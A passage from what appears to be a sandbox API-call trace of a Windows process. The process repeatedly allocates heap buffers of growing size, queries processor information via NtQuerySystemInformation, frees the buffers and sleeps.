Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.382] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.382] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.383] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.383] Sleep (dwMilliseconds=0x110) [0215.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.393] Sleep (dwMilliseconds=0x110) [0215.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.411] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.412] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.412] Sleep (dwMilliseconds=0x110) [0215.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.439] Sleep (dwMilliseconds=0x110) [0215.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.458] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.458] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.459] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.459] Sleep (dwMilliseconds=0x110) [0215.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.470] Sleep (dwMilliseconds=0x110) [0215.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.489] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.490] Sleep (dwMilliseconds=0x110) [0215.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.505] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.506] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.506] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.507] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.507] Sleep (dwMilliseconds=0x110) [0215.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.517] Sleep (dwMilliseconds=0x110) [0215.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.536] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.537] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.537] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.537] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.538] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.538] Sleep (dwMilliseconds=0x110) [0215.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.549] Sleep (dwMilliseconds=0x110) [0215.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.567] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.568] Sleep (dwMilliseconds=0x110) [0215.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.579] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.579] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.582] Sleep (dwMilliseconds=0x110) [0215.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.597] Sleep (dwMilliseconds=0x110) [0215.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.614] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.614] HeapFree (in: hHeap=0x2560000, 